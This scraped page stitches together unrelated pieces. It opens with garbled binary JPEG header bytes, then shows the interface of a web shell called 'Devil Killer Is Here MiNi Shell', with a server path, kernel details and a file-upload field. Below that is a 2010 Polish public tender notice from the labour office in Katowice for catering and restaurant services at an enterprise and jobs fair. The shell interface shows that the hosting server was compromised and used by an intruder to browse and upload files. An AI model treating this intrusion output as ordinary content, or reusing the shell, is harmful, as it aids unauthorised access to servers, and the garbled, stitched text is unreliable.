JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/134487-N-2010.html

<p class="kh_header"><b>Katowice: świadczenie usługi cateringowej i restauracyjnej w czasie Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w dniu 18 czerwca 2010 r.</b><br>
<b>Numer ogłoszenia: 134487 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usługi cateringowej i restauracyjnej w czasie Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w dniu 18 czerwca 2010 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej i restauracyjnej w czasie Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w dniu 18 czerwca 2010 r. Postępowanie prowadzone jest w 4 częściach.


CZĘŚĆ I
Przedmiotem zamówienia jest świadczenie usługi cateringowej dla  200 osób - gości i wystawców podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Katowicach w dniu 18.06.2010 r. 
Na usługę składać się będą:
1) Napoje gorące:
- kawa rozpuszczalna podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata  podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
2) Napoje zimne:
- woda mineralna niegazowana (150 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (100 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (100 porcji x 200 ml), jabłkowy (100 porcji x 200 ml), z czarnej porzeczki (100 porcji x 200 ml), podawane w szklanych dzbankach, 
3)  Kanapki bankietowe na białym i ciemnym pieczywie:
- z szynką i pomidorem (60 szt x 40 g),
- z serem typu camembert i orzechem włoskim (60 szt x 40 g),
- z twarożkiem, szczypiorkiem i orzechem włoskim (60 szt. x 40 g),
- z łososiem i cytrynką (60 szt. x 40 g),
- z jajkiem i kolorowym kawiorem (60 szt. x 40 g),
- z salami i marynatami (60 szt. x 40 g),
- z żółtym serem i oliwkami (60 szt. x 40 g); 
4) Sałatki - 2 rodzaje:
- sałatka grecka (150 porcji x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (150 porcji x 100 g),
5) Świeże owoce podawane na paterach:
-  jabłka - 2 kg,
- banany - 1,5 kg,
- winogrona (zielone, czarne) - 3 kg,
- pomarańcze - 1,5 kg,
- mandarynki - 2 kg,
6) Ciastka bankietowe:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (80 porcji x 65 g),
- szarlotka (80 porcji x 65 g),
- mini drożdżówka (80 porcji x 65 g),  
7) Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (60 szt.),
- babeczki z łososia wędzonego (60 szt),
- ruloniki ze schabu z musem chrzanowym (60 szt),
- jajka faszerowane z pieczarką (60 szt),
- koreczki mini caprese (mozarella i pomidorki - 30 szt),
- koreczki z serem żółtym i kabanosem (30 szt),
8) Ciepły posiłek (do podania w podgrzewaczach na godz. 12:00)
- bogracz, strogonow lub równoważne danie firmowe (120 porcji x 200 ml), 
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami (120 porcji x 200 g), 
- pieczywo mieszane (białe, ciemne - 120 porcji x 50 g),
9) produkty do rozłożenia na stoiskach targowych: 
- 150 butelek (500 ml) wody mineralnej gazowanej,
- 150 butelek (500 ml) wody mineralnej niegazowanej,
- 150 kubeczków jednorazowych,
- słone paluszki (70 opakowań po min. 70g). 
Catering powinien zostać dostarczony do miejsca odbywania Targów - Gmachu Śląskiego Urzędu Wojewódzkiego ul. Jagiellońska 25, Sala Szara, na godz. 9:00 natomiast ciepły posiłek  na godzinę 12:00.  
Ponadto Wykonawca zobowiązany jest  zapewnić:
- zastawę białą porcelanową, sztućce trwałe, 
- dekorację stołu - obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe,
- obsługę kelnerską przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00),
- transport. 


 CZĘŚĆ II
Przedmiotem zamówienia jest świadczenie usługi cateringowej dla  40 osób - gości i wystawców podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Częstochowie w dniu 18.06.2010 r. 
Na usługę składać się będą:
1) Napoje gorące:
- kawa rozpuszczalna podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata  podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
2) Napoje zimne:
- woda mineralna niegazowana (25 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (20 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (25 porcji x 200 ml), jabłkowy (25 porcji x 200 ml), z czarnej porzeczki (25 porcji x 200 ml), podawane w szklanych dzbankach, 
3)  Kanapki bankietowe na białym i ciemnym pieczywie:
- z szynką i pomidorkiem (13 szt x 40 g),
- z serem typu camembert i orzechem włoskim (13 szt x 40 g),
- z twarożkiem, szczypiorkiem i orzechem włoskim (13 szt. x 40 g),
- z łososiem i cytrynką (13 szt. x 40 g),
- z jajkiem i kolorowym kawiorem (13 szt. x 40 g),
- z salami i marynatami (13 szt. x 40 g),
- z żółtym serem i oliwkami (13 szt. x 40 g); 
4) Sałatki - 2 rodzaje:
- sałatka grecka (30 porcji x 100 g),
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (30 porcji x 100 g),
5) Świeże owoce podawane na paterach:
-  jabłka - 1 kg,
- banany - 1 kg,
- winogrona (zielone, czarne) - 1 kg,
- pomarańcze - 1 kg,
- mandarynki - 1 kg
6) Ciastka bankietowe:
- mini ciastka francuskie z jabłkiem brzoskwinią (15 porcji x 65 g),
- szarlotka (15 porcji x 65 g),
- mini drożdżówka (15 porcji x 65 g),  
7) Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (10 szt.),
- babeczki z łososia wędzonego (10 szt),
- ruloniki ze schabu z musem chrzanowym (10 szt),
- jajka faszerowane z pieczarką (10 szt),
- koreczki mini caprese (mozarella i pomidorki - 10 szt),
- koreczki z serem żółtym i kabanosem (10 szt)
8) Ciepły posiłek (do podania w podgrzewaczach na godz. 12:00):
- bogracz, strogonow lub równoważne danie firmowe (25 porcji x 200 ml), 
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami (25 porcji x 200 g), 
- pieczywo mieszane (białe, ciemne - 25 porcji x 50 g),
9) Produkty do rozłożenia na stoiskach targowych: 
- 30 butelek (500 ml) wody mineralnej gazowanej,
- 30 butelek (500 ml) wody mineralnej niegazowanej,
- 60 kubeczków jednorazowych,
- słone paluszki (30 opakowań po min. 70g). 
Catering powinien zostać dostarczony do miejsca odbywania Targów - VII Liceum Ogólnokształcące im. Mikołaja Kopernika w Częstochowie ul. Nowowiejskiego 18, do pomieszczeń szatni hali sportowej na godz. 9:00 natomiast ciepły posiłek na godzinę 12:00.  
Ponadto Wykonawca zobowiązany jest zapewnić:
- zastawę białą porcelanową, sztućce trwałe, 
- dekorację stołu - obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe,
- obsługę kelnerską przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00).
- transport. 


CZĘŚĆ III
Przedmiotem zamówienia jest świadczenie usługi cateringowej dla  40 osób - gości i wystawców podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Bielsku - Białej w dniu 18.06.2010 r. 
Na usługę składać się będą:
1) Napoje gorące:
- kawa rozpuszczalna podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata  podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
2) Napoje zimne:
- woda mineralna niegazowana (25 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (20 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (25 porcji x 200 ml), jabłkowy (25 porcji x 200 ml), z czarnej porzeczki (25 porcji x 200 ml), podawane w szklanych dzbankach, 
3)  Kanapki bankietowe na białym i ciemnym pieczywie (wek i pumpernikiel):
- z szynką i pomidorkiem (13 szt x 40 g),
- z serem typu camembert i orzechem włoskim (13 szt x 40 g),
- z twarożkiem, szczypiorkiem i orzechem włoskim (13 szt. x 40 g),
- z łososiem i cytrynką (13 szt. x 40 g),
- z jajkiem i kolorowym kawiorem (13 szt. x 40 g),
- z salami i marynatami (13 szt. x 40 g),
- z żółtym serem i oliwkami (13 szt. x 40 g); 
4) sałatki - 2 rodzaje:
- sałatka grecka (30 porcji x 100 g),
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (30 porcji x 100 g),
5) Świeże owoce podawane na paterach:
-  jabłka - 1 kg,
- banany - 1 kg,
- winogrona (zielone, czarne) - 1 kg,
- pomarańcze - 1 kg,
- mandarynki - 1 kg
6) Ciastka bankietowe:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (15 porcji x 65 g),
- szarlotka (15 porcji x 65 g),
- mini drożdżówka (15 porcji x 65 g),  
7) Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (10 szt.),
- babeczki z łososia wędzonego (10 szt),
- ruloniki ze schabu z musem chrzanowym (10 szt),
- jajka faszerowane z pieczarką (10 szt),
- koreczki mini caprese (mozarella i pomidorki - 10 szt),
- koreczki z serem żółtym i kabanosem (10 szt),
8) Ciepły posiłek (do podania w podgrzewaczach na godz. 12:00)
- bogracz, strogonow lub równoważne danie firmowe (25 porcji x 200 ml), 
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami (25 porcji x 200 g), 
- pieczywo mieszane (białe, ciemne - 25 porcji x 50 g),
9) Produkty do rozłożenia na stoiskach targowych: 
- 30 butelek (500 ml) wody mineralnej gazowanej,
- 30 butelek (500 ml) wody mineralnej niegazowanej,
- 60 kubeczków jednorazowych,
- słone paluszki (30 opakowań po min. 70g). 
Catering powinien zostać dostarczony do miejsca odbywania Targów - Wyższa Szkoła Bankowości i Finansów w Bielsku - Białej, ul. Tańskiego 5, sala cateringowa, II piętro, pokój nr 317  na godz. 9:00, natomiast ciepły posiłek na godzinę 12:00.  
Ponadto Wykonawca zobowiązany jest zapewnić:
- zastawę białą porcelanową, sztućce trwałe, 
- dekorację stołu - obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe,
- obsługę kelnerską przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00),
- transport. 


CZĘŚĆ IV
Przedmiotem zamówienia jest świadczenie usługi restauracyjnej - kolacji, w formie bufetu szwedzkiego wydanej w lokalu, który zapewni Wykonawca, w dniu 18.06.2010r. o godz. 18:00 dla 22 gości zagranicznych i wystawców biorących udział w Europejskich Targach Przedsiębiorczości, Pracy i Edukacji w Katowicach oraz przedstawicieli organizatora. 
Na usługę składać się będą:
- 3 rodzaje przystawek (mozarella z pomidorami, bazylią, oliwą z oliwek i sosem balsamicznym, pieczarki faszerowane z szynką lub ziołami, carpaccio z polędwicy wołowej lub łososia), 
- 3 rodzaje zup (rosół z makaronem, krem z borowików, żurek z białą kiełbasą i jajkiem), 
- 3 dania główne (szaszłyk drobiowy, makaron Carbonara, dorsz w koszulce z masłem koperkowym),
- dodatki: grillowane warzywa (bakłażan, cukinia, marchew, cebula, papryka), ryż, zapiekane ziemniaki, 
- deser: ciasto cytrynowe, świeże owoce, deska serów, 
- napoje: woda mineralna, soki (jabłkowy, z czarnej porzeczki), kawa, herbata, 1 lampka wina,
- zimna płyta: rożki szynkowe (wysokogatunkowe wędliny nadziewane papryką, oliwkami itp.), deska serów, śledź w śmietanie, tymbaliki z drobiu, mięso pieczone nadziewane (schab nadziewany kiełbasą wiejską, szynka pieczona), sałatka jarzynowa, sałatka ryżowa z tuńczykiem, jajka faszerowane, pieczywo, masło.
- obsługa kelnerska. 
Restauracja powinna być zlokalizowana w granicach administracyjnych miasta Katowice oraz dysponować wyodrębnioną salą zdolną pomieścić 22 gości przy stołach ustawionych w kształcie podkowy lub w kształcie prostokąta.    
Ostateczna liczba uczestników zostanie przekazana Wykonawcy na 2 dni robocze przed wykonaniem usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 18.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
wykażą się realizacją co najmniej trzech usług odpowiadających swoim rodzajem i zakresem przedmiotowi zamówienia w ciągu  ostatnich 3 lat, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem dat ich wykonania i odbiorców. Należy załączyć dokumenty  potwierdzające, że te usługi zostały wykonane należycie - np. referencje;

Część II 
wykażą się realizacją co najmniej trzech usług odpowiadających swoim rodzajem i zakresem przedmiotowi zamówienia w ciągu  ostatnich 3 lat, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem dat ich wykonania i odbiorców. Należy załączyć dokumenty  potwierdzające, że te usługi zostały wykonane należycie - np. referencje;

Część III	

wykażą się realizacją co najmniej trzech usług odpowiadających swoim rodzajem i zakresem przedmiotowi zamówienia w ciągu  ostatnich 3 lat, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem dat ich wykonania i odbiorców. Należy załączyć dokumenty  potwierdzające, że te usługi zostały wykonane należycie - np. referencje;


Opis sposobu dokonywania oceny spełnienia tego warunku - Wykonawca przedstawi wykaz wraz z dokumentami potwierdzającymi należyte wykonanie zrealizowanego zamówienia, a Zamawiający dokona oceny spełnienia warunku wg formuły spełnia nie spełnia. 
Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I 
wykonawca w zakładzie posiada wydzieloną kuchnię, zmywalnię naczyń stołowych, magazyny oraz pomieszczenie socjalne. Ponadto zapewnia stały dopływ bieżącej ciepłej i zimnej wody do punktów wodnych a także wyposaża zakład w sprawne urządzenia chłodnicze. Wykonawca dysponuje również środkiem transportu wykorzystywanym do przewozu żywności, spełniającym warunki higieniczno-sanitarne.



Część II

wykonawca w zakładzie posiada wydzieloną kuchnię, zmywalnię naczyń stołowych, magazyny oraz pomieszczenie socjalne. Ponadto zapewnia stały dopływ bieżącej ciepłej i zimnej wody do punktów wodnych a także wyposaża zakład w sprawne urządzenia chłodnicze. Wykonawca dysponuje również środkiem transportu wykorzystywanym do przewozu żywności, spełniającym warunki higieniczno-sanitarne.


Część III

wykonawca w zakładzie posiada wydzieloną kuchnię, zmywalnię naczyń stołowych, magazyny oraz pomieszczenie socjalne. Ponadto zapewnia stały dopływ bieżącej ciepłej i zimnej wody do punktów wodnych a także wyposaża zakład w sprawne urządzenia chłodnicze. Wykonawca dysponuje również środkiem transportu wykorzystywanym do przewozu żywności, spełniającym warunki higieniczno-sanitarne.


Opis sposobu dokonywania oceny spełnienia tego warunku
Wykonawca przedstawi oświadczenie - załącznik Nr 6 do SIWZ , a Zamawiający dokona oceny spełnienia warunków wg formuły: spełnia nie spełnia. 
Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
Wykonawca posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Część II
Wykonawca posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Część III
Wykonawca posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Część IV
Wykonawca posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

Opis sposobu dokonywania oceny spełnienia tego warunku
Wykonawca przedłoży poświadczoną za zgodność z oryginałem kopię opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, ważny co najmniej do 30 czerwca 2010 roku.
Wykonawca przedstawi poświadczoną za zgodność z oryginałem kopię polisy , a Zamawiający dokona oceny spełnienia warunków wg formuły: spełnia nie spełnia. 

Nie spełnienie wyżej wymienionych warunków, skutkować będzie wykluczeniem Wykonawcy z danej części postępowania.

W przypadku korzystania z potencjału technicznego i osób zdolnych do wykonania zamówienia, które zostaną udostępnione przez inne podmioty, Wykonawca załączy do oferty pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zadania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.1.2). W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
